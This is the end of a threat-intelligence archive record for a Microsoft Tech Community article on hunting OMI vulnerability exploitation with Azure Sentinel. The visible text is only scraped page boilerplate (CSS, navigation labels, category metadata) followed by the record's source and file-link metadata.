height:\r\n3.25rem; /* Increase last child height to make in align with the hover label */\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_x-icon_qp4x5_465 {\\r\\n filter: invert(100%);\\r\\n transition: filter 0.3s ease;\\r\\n width: 1.25rem !important;\\r\\n height: auto;\\r\\n\r\npadding-top: 0.3125rem !important;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_bluesky-icon_qp4x5_479 {\\r\\n filter:\r\ninvert(20%) sepia(100%) saturate(3000%) hue-rotate(180deg);\\r\\n transition: filter 0.3s ease;\\r\\n padding-top: 0.3125rem\r\n!important;\\r\\n width: 1.5625rem !important;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_share-icon_qp4x5_493 {\\r\\n border:\r\n2px solid transparent;\\r\\n display: inline-block;\\r\\n position: relative;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li:hover {\\r\\n border: 2px solid white;\\r\\n border-left: none;\\r\\n border-bottom: none;\\r\\n border-radius:\r\n0;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449:hover {\\r\\n border-bottom: 2px solid white; /* Add bottom border only to the last item\r\n*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li:hover\r\n.custom_widget_MicrosoftFooter_label_qp4x5_525 {\\r\\n opacity: 1;\\r\\n visibility: visible;\\r\\n border: 2px solid white;\\r\\n\r\nbox-sizing: border-box;\\r\\n border-left: none;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_label_qp4x5_525 {\\r\\n position:\r\nabsolute;\\r\\n left: 100%;\\r\\n white-space: nowrap;\\r\\n opacity: 0;\\r\\n visibility: hidden;\\r\\n transition: all 0.2s ease;\\r\\n color:\r\nwhite;\\r\\n border-radius: 0 10 0 0.625rem;\\r\\n top: 50%;\\r\\n transform: translateY(-50%);\\r\\n height: 3.25rem;\\r\\n display:\r\nflex;\\r\\n align-items: center;\\r\\n justify-content: center;\\r\\n padding: 0.625rem 0.75rem 0.9375rem 0.5rem;\\r\\n border: 2px\r\nsolid white;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_linkedin_qp4x5_317 
{\\r\\n background-color: #0474b4;\\r\\n border-top-right-radius: 5px; /* Rounded top right corner of first\r\nitem*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_facebook_qp4x5_585 {\\r\\n background-color:\r\n#3c5c9c;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_twitter_qp4x5_591 {\\r\\n background-color: black;\\r\\n color:\r\nwhite;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_reddit_qp4x5_599 {\\r\\n background-color:\r\n#fc4404;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_mail_qp4x5_605 {\\r\\n background-color: #848484;\\r\\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of last\r\nitem*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_bluesky_qp4x5_479 {\\r\\n background-color: #f0f2f5;\\r\\n color:\r\nblack;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_rss_qp4x5_621 {\\r\\n background-color: #ec7b1c;\\r\\n}\\r\\n@media (max-width: 991px) {\\r\\n .custom_widget_MicrosoftFooter_social-share_qp4x5_281 {\\r\\n display: none;\\r\\n }\\r\\n}\\r\\n\",\"tokens\":\r\n{\"context-uhf\":\"custom_widget_MicrosoftFooter_context-uhf_qp4x5_1\",\"c-uhff-link\":\"custom_widget_MicrosoftFooter_c-uhff-link_qp4x5_23\",\"c-uhff\":\"custom_widget_MicrosoftFooter_c-uhff_qp4x5_23\",\"c-uhff-nav\":\"custom_widget_MicrosoftFooter_c-uhff-nav_qp4x5_69\",\"c-heading-4\":\"custom_widget_MicrosoftFooter_c-heading-4_qp4x5_97\",\"c-uhff-nav-row\":\"custom_widget_MicrosoftFooter_c-uhff-nav-row_qp4x5_113\",\"c-uhff-nav-group\":\"custom_widget_MicrosoftFooter_c-uhff-nav-group_qp4x5_115\",\"c-list\":\"custom_widget_MicrosoftFooter_c-list_qp4x5_155\",\"f-bare\":\"custom_widget_MicrosoftFooter_f-bare_qp4x5_155\",\"c-uhff-base\":\"custom_widget_MicrosoftFooter_c-uhff-base_qp4x5_187\",\"c-uhff-ccpa\":\"custom_widget_MicrosoftFooter_c-uhff-ccpa_qp4x5_213\",\"c-uhff-consumer\":\"custom_widget_MicrosoftFooter_c-uhff-consumer_qp4x5_215\",\"social-share\":\"custom_widget_MicrosoftFooter_social-share_qp4x5_281\",\"sharing-options\":\"custom_widget_MicrosoftFooter_sharing-options_qp4x5_297\",\"linkedi
n-icon\":\"custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317\",\"social-share-email-image\":\"custom_widget_MicrosoftFooter_social-share-email-image_qp4x5_331\",\"social-link-footer\":\"custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339\",\"social-share-list\":\"custom_widget_MicrosoftFooter_social-share-list_qp4x5_365\",\"social-share-rss-image\":\"custom_widget_MicrosoftFooter_social-share-rss-image_qp4x5_371\",\"social-share-list-linkedin\":\"custom_widget_MicrosoftFooter_social-share-list-linkedin_qp4x5_411\",\"social-share-list-facebook\":\"custom_widget_MicrosoftFooter_social-share-list-facebook_qp4x5_419\",\"social-share-list-xicon\":\"custom_widget_MicrosoftFooter_social-share-list-xicon_qp4x5_425\",\"social-share-list-reddit\":\"custom_widget_MicrosoftFooter_social-share-list-reddit_qp4x5_431\",\"social-share-list-bluesky\":\"custom_widget_MicrosoftFooter_social-share-list-bluesky_qp4x5_437\",\"social-share-list-rss\":\"custom_widget_MicrosoftFooter_social-share-list-rss_qp4x5_443\",\"social-share-list-mail\":\"custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449\",\"x-icon\":\"custom_widget_MicrosoftFooter_x-icon_qp4x5_465\",\"bluesky-icon\":\"custom_widget_MicrosoftFooter_bluesky-icon_qp4x5_479\",\"share-icon\":\"custom_widget_MicrosoftFooter_share-icon_qp4x5_493\",\"label\":\"custom_widget_MicrosoftFooter_label_qp4x5_525\",\"linkedin\":\"custom_widget_MicrosoftFooter_linkedin_qp4x5_317\",\"faceb\r\ncomponents/community/Breadcrumb-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/Breadcrumb-1775111751222\",\"value\":{\"navLabel\":\"Breadcrumbs\",\"dropdown\":\"Additional parent\r\npage navigation\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageBanner-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 33 of 
38\n\n1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageBanner-1775111751222\",\"value\":{\"messageMarkedAsSpam\":\"This post has been marked as\r\nspam\",\"messageMarkedAsSpam@board:TKB\":\"This article has been marked as\r\nspam\",\"messageMarkedAsSpam@board:BLOG\":\"This post has been marked as\r\nspam\",\"messageMarkedAsSpam@board:FORUM\":\"This discussion has been marked as\r\nspam\",\"messageMarkedAsSpam@board:OCCASION\":\"This event has been marked as\r\nspam\",\"messageMarkedAsSpam@board:IDEA\":\"This idea has been marked as spam\",\"manageSpam\":\"Manage\r\nSpam\",\"messageMarkedAsAbuse\":\"This post has been marked as abuse\",\"messageMarkedAsAbuse@board:TKB\":\"This\r\narticle has been marked as abuse\",\"messageMarkedAsAbuse@board:BLOG\":\"This post has been marked as\r\nabuse\",\"messageMarkedAsAbuse@board:FORUM\":\"This discussion has been marked as\r\nabuse\",\"messageMarkedAsAbuse@board:OCCASION\":\"This event has been marked as\r\nabuse\",\"messageMarkedAsAbuse@board:IDEA\":\"This idea has been marked as\r\nabuse\",\"preModCommentAuthorText\":\"This comment will be published as soon as it is\r\napproved\",\"preModCommentModeratorText\":\"This comment is awaiting moderation\",\"messageMarkedAsOther\":\"This post\r\nhas been rejected due to other reasons\",\"messageMarkedAsOther@board:TKB\":\"This article has been rejected due to other\r\nreasons\",\"messageMarkedAsOther@board:BLOG\":\"This post has been rejected due to other\r\nreasons\",\"messageMarkedAsOther@board:FORUM\":\"This discussion has been rejected due to other\r\nreasons\",\"messageMarkedAsOther@board:OCCASION\":\"This event has been rejected due to other\r\nreasons\",\"messageMarkedAsOther@board:IDEA\":\"This idea has been rejected due to other\r\nreasons\",\"messageArchived\":\"This post was archived on {date}\",\"relatedUrl\":\"View Related\r\nContent\",\"relatedContentText\":\"Showing related content\",\"archivedContentLink\":\"View 
Archived\r\nContent\"},\"localOverride\":false},\"Category:category:Exchange\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Exchange\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Outlook\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Outlook\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Community-Info-Center\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Community-Info-Center\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:EducationSector\":\r\n{\"__typename\":\"Category\",\"id\":\"category:EducationSector\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:DrivingAdoption\":\r\n{\"__typename\":\"Category\",\"id\":\"category:DrivingAdoption\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Azure\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Azure\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Windows-Server\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Windows-Server\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:MicrosoftTeams\":\r\n{\"__typename\":\"Category\",\"id\":\"category:MicrosoftTeams\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:categor
y:PublicSector\":\r\n{\"__typename\":\"Category\",\"id\":\"category:PublicSector\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:microsoft365\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoft365\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:IoT\":\r\n{\"__typename\":\"Category\",\"id\":\"category:IoT\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:HealthcareAndLifeSciences\":\r\n{\"__typename\":\"Category\",\"id\":\"category:HealthcareAndLifeSciences\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:ITOpsTalk\":\r\n{\"__typename\":\"Category\",\"id\":\"category:ITOpsTalk\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:MicrosoftMechanics\":\r\n{\"__typename\":\"Category\",\"id\":\"category:MicrosoftMechanics\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:MicrosoftforNonprofits\":\r\n{\"__typename\":\"Category\",\"id\":\"category:MicrosoftforNonprofits\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:PartnerCommunity\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 34 of 
38\n\n{\"__typename\":\"Category\",\"id\":\"category:PartnerCommunity\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Microsoft365Copilot\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Microsoft365Copilot\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Windows\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Windows\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Content_Management\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Content_Management\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:CommunityNewsDesk\":\r\n{\"__typename\":\"Category\",\"id\":\"category:CommunityNewsDesk\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:microsoft-learn-for-educators\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoft-learn-for-educators\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:mvp\":\r\n{\"__typename\":\"Category\",\"id\":\"category:mvp\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:microsoftintune\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoftintune\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:microsoft-global-community-in
itiative\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoft-global-community-initiative\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:usergroups\":\r\n{\"__typename\":\"Category\",\"id\":\"category:usergroups\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:skills-hub\":\r\n{\"__typename\":\"Category\",\"id\":\"category:skills-hub\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Blog:board:skills-hub-blog\":\r\n{\"__typename\":\"Blog\",\"id\":\"board:skills-hub-blog\",\"blogPolicies\":{\"__typename\":\"BlogPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}},\"boardPolicies\":{\"__typename\":\"BoardPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"CachedAsset:text:en_US-components/community/Navbar-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/Navbar-1775111751222\",\"value\":{\"community\":\"Community Home\",\"inbox\":\"Inbox\",\"manageContent\":\"Manage\r\nContent\",\"tos\":\"Terms of Service\",\"forgotPassword\":\"Forgot Password\",\"themeEditor\":\"Theme Editor\",\"edit\":\"Edit\r\nNavigation Bar\",\"skipContent\":\"Skip to content\",\"gxcuf89792\":\"Tech Community\",\"windows-server\":\"Windows\r\nServer\",\"ms-learn-ext-security\":\"Microsoft Security\",\"Common_Enntvz-i-t-ops-talk-link\":\"ITOps Talk\",\"education-sector\":\"Education Sector\",\"Common-external-link-9\":\"Microsoft 365\",\"Common-external-link-8\":\"Dynamics\r\n365\",\"Common-external-link-7\":\"Skilling Room Directory\",\"Common-external-link-6\":\"Events\",\"Common-external-link-5\":\"Blogs\",\"Common-external-link-4\":\"View 
All\",\"Common-gxcuf89792-community\":\"Community\",\"Common-external-link-3\":\"Topics\",\"microsoft365\":\"Microsoft 365\",\"Common_Enntvz-community-news-desk-link\":\"Community News\r\nDesk\",\"Common_Enntvz-azure-link\":\"Azure\",\"Common-community-info-center-link\":\"Lounge\",\"azure\":\"Azure\",\"Common_Enntvz-windows-link\":\"Windows\",\"Common_Enntvz-education-sector-link\":\"Education Sector\",\"Common-windows-server-link\":\"Windows Server\",\"products-link\":\"Products\",\"Common_Enntvz-partner-community-link\":\"Microsoft Partner Community\",\"microsoft-learn-blog\":\"Blog\",\"Common-external-link-2\":\"View All\",\"community-hub-link\":\"Community Hubs\",\"Common-mvp-link\":\"Microsoft MVP Program\",\"community-info-center\":\"Lounge\",\"microsoft-endpoint-manager\":\"Microsoft\r\nIntune\",\"startupsat-microsoft\":\"Startups at Microsoft\",\"ms-learn-ext-azure\":\"Azure\",\"Common_Enntvz-content_management-link\":\"Content Management\",\"ms-learn-ext-github\":\"Github\",\"Common-microsoft365-\r\nlink\":\"Microsoft 365\",\"Common-i-t-ops-talk-link\":\"ITOps Talk\",\"Common_Enntvz-view-all-products-link\":\"View\r\nAll\",\"Common-microsoft-global-community-initiative-link\":\"Microsoft Global Community Initiative (MGCI)\",\"all-events-link\":\"Events\",\"Common_Enntvz-microsoft-learn-for-educators-link\":\"Microsoft Learn for Educators\",\"Common-external-link\":\"Community Hubs\",\"Common-partner-community-link\":\"Microsoft Partner Community\",\"Common-microsoft-learn-for-educators-link\":\"Microsoft Learn for Educators\",\"Common_Enntvz-microsoft-teams-link\":\"Microsoft Teams\",\"driving-adoption\":\"Driving Adoption\",\"microsoft-learn\":\"Microsoft Learn\",\"Common-healthcare-and-life-sciences-link\":\"Healthcare and Life Sciences\",\"planner\":\"Outlook\",\"Common_Enntvz-exchange-link\":\"Exchange\",\"healthcare-and-life-sciences\":\"Healthcare and Life Sciences\",\"Common-external-link-10\":\"View All\",\"Common-driving-adoption-link\":\"Driving 
Adoption\",\"ms-learn-ext-pp\":\"Power Platform\",\"Common_Enntvz-windows-server-link\":\"Windows\r\nServer\",\"Common-io-t-link\":\"Internet of Things (IoT)\",\"Skills-Hub\":\"Skills Hub\",\"microsoft-teams\":\"Microsoft\r\nTeams\",\"Common-outlook-link\":\"Outlook\",\"Common_Enntvz-public-sector-link\":\"Public Sector\",\"Common-windows-link\":\"Windows\",\"all-blogs-link\":\"Blogs\",\"communities\":\"Products\",\"Common_Enntvz-usergroups-link\":\"User\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 35 of 38\n\nGroups\",\"Common_Enntvz-microsoft-global-community-initiative-link\":\"Microsoft Global Community Initiative\r\n(MGCI)\",\"Skills-Hub-link\":\"Community\",\"Common_Enntvz-io-t-link\":\"Internet of Things (IoT)\",\"ms-learn-ext-m365\":\"Microsoft 365\",\"Common_Enntvz-microsoft-mechanics-link\":\"Microsoft Mechanics\",\"microsoft-learn-community\":\"Community\",\"partner-community\":\"Microsoft Partner Community\",\"Common-microsoft-mechanics-link\":\"Microsoft Mechanics\",\"Common_Enntvz-healthcare-and-life-sciences-link\":\"Healthcare and Life\r\nSciences\",\"microsoft-mechanics\":\"Microsoft Mechanics\",\"Common-microsoft-security-link\":\"Microsoft\r\nSecurity\",\"Common-education-sector-link\":\"Education Sector\",\"Skills-Hub-Blog\":\"Blog\",\"i-t-ops-talk\":\"ITOps\r\nTalk\",\"microsoft-securityand-compliance\":\"Microsoft Security\",\"Common_Enntvz-microsoftintune-link\":\"Microsoft\r\nIntune\",\"Common-azure-link\":\"Azure\",\"Common-microsoftintune-link\":\"Microsoft Intune\",\"Common_Enntvz-view-all-topics-link\":\"View All\",\"Common-usergroups-link\":\"User Groups\",\"Common-public-sector-link\":\"Public\r\nSector\",\"Common_Enntvz-microsoft-security-link\":\"Microsoft Security\",\"Common_Enntvz-outlook-link\":\"Outlook\",\"Common_Enntvz-mvp-link\":\"Microsoft MVP Program\",\"exchange\":\"Exchange\",\"topics-link\":\"Topics\",\"io-t\":\"Internet of 
Things (IoT)\",\"Common-microsoft365-copilot-link\":\"Microsoft 365 Copilot\",\"Common-microsoft-teams-link\":\"Microsoft Teams\",\"s-m-b\":\"Nonprofit Community\",\"Common_Enntvz-community-info-center-link\":\"Lounge\",\"Common_Enntvz-microsoft365-copilot-link\":\"Microsoft 365 Copilot\",\"Common_Enntvz-microsoftfor-nonprofits-link\":\"Nonprofit Community\",\"Common_Enntvz-microsoft365-link\":\"Microsoft 365\",\"Common-content_management-link\":\"Content Management\",\"ms-learn-ext-teams\":\"Teams\",\"s-q-l-server\":\"Content\r\nManagement\",\"products-services\":\"Products\",\"Common-community-news-desk-link\":\"Community News Desk\",\"ms-learn-ext-LD\":\"Skilling Room Directory\",\"Common-exchange-link\":\"Exchange\",\"Common-gxcuf89792-link\":\"Tech\r\nCommunity\",\"windows\":\"Windows\",\"public-sector\":\"Public Sector\",\"Common_Enntvz-driving-adoption-link\":\"Driving\r\nAdoption\",\"Common-microsoftfor-nonprofits-link\":\"Nonprofit Community\",\"ms-learn-ext-net\":\".NET\",\"ms-learn-ext-dynamics\":\"Dynamics 365\",\"a-i\":\"AI and Machine Learning\",\"outlook\":\"Microsoft 365\r\nCopilot\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/community/NavbarHamburgerDropdown-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/NavbarHamburgerDropdown-1775111751222\",\"value\":{\"hamburgerLabelOpen\":\"Open Side Menu\",\"hamburgerLabelClose\":\"Close Side\r\nMenu\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/community/BrandLogo-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/BrandLogo-1775111751222\",\"value\":\r\n{\"logoAlt\":\"Khoros\",\"themeLogoAlt\":\"Brand Logo\",\"linkAriaLabel\":\"Go to community 
home\r\npage\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/community/NavbarTextLinks-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/NavbarTextLinks-1775111751222\",\"value\":\r\n{\"more\":\"More\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/search/SpotlightSearchIcon-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/search/SpotlightSearchIcon-1775111751222\",\"value\":{\"search\":\"Search\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/authentication/AuthenticationLink-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/authentication/AuthenticationLink-1775111751222\",\"value\":{\"title.login\":\"Sign\r\nIn\",\"title.registration\":\"Register\",\"title.forgotPassword\":\"Forgot Password\",\"title.multiAuthLogin\":\"Sign\r\nIn\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/nodes/NodeLink-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/nodes/NodeLink-1775111751222\",\"value\":{\"place\":\"Go back\r\nto {name}\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageView/MessageViewStandard-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageView/MessageViewStandard-1775111751222\",\"value\":\r\n{\"anonymous\":\"Anonymous\",\"author\":\"{messageAuthorLogin}\",\"authorBy\":\"{messageAuthorLogin}\",\"board\":\"\r\n{messageBoardTitle}\",\"replyToUser\":\" to {parentAuthor}\",\"showMoreReplies\":\"Show\r\nMore\",\"replyText\":\"Reply\",\"repliesText\":\"Replies\",\"markedAsSolved\":\"Marked as Solution\",\"messageStatus\":\"Status:\r\n\",\"statusChanged\":\"Status changed: {previousStatus} to {currentStatus}\",\"statusAdded\":\"Status added:\r\n{status}\",\"statusRemoved\":\"Status removed: {status}\",\"labelExpand\":\"expand 
\r\nSource: https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093"
	],
	"report_names": [
		"2764093"
	],
	"threat_actors": [],
	"ts_created_at": 1775439029,
	"ts_updated_at": 1775791244,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24e45f419cf7fb1521dd57c704036b0e68a2f72e.pdf",
		"text": "https://archive.orkl.eu/24e45f419cf7fb1521dd57c704036b0e68a2f72e.txt",
		"img": "https://archive.orkl.eu/24e45f419cf7fb1521dd57c704036b0e68a2f72e.jpg"
	}
}